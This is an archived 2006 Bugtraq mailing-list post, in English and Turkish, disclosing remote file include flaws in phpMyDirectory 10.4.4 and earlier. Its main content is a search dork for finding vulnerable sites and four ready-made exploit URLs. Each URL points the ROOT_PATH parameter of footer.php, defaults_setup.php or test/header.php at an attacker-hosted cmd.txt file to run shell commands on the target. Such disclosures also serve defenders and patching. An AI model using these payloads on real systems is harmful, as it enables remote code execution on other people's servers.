phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
From: ajannhwt@xxxxxxxxxxx
Date: 22 May 2006 18:35:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

ENGLISH

# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include 
Vulnerabilities

# Dork   :   "powered by phpmydirectory"

# Author :   ajann

# greetz :   Nukedx,TheHacker 

# Exploit;

###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

# ajann,Turkey


TURKISH

# Ba&#351;l&#305;k          :   phpMyDirectory <= 10.4.4 Multiple Remote File 
Include Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç&#305;&#287;&#305; Bulan     :   ajann
# greetz          :   Nukedx,TheHacker 
# Aç&#305;k bulunan dosyalar;

###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

Aç&#305;klama: 
Temalarda bulunan footer.php dosyas&#305; güvenlik aç&#305;&#287;&#305;na yol 
açmaktad&#305;r.Bu sayede uzaktan kod çal&#305;&#351;t&#305;r&#305;labilir.
defaults_setup.php kurulumdan sonra silinmemi&#351;se ayn&#305; aç&#305;k 
uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,ayn&#305; aç&#305;k 
bulunmaktad&#305;r.
Aç&#305;k 10.4.4 dahil alt sürümlerinde çal&#305;&#351;maktad&#305;r.

Thanks.

Prev by Date: [security bulletin] HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local Elevation of Privilege
Next by Date: AlstraSoft E-Friends - XSS
Previous by thread: [security bulletin] HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local Elevation of Privilege
Next by thread: AlstraSoft E-Friends - XSS
Index(es):
- Date
- Thread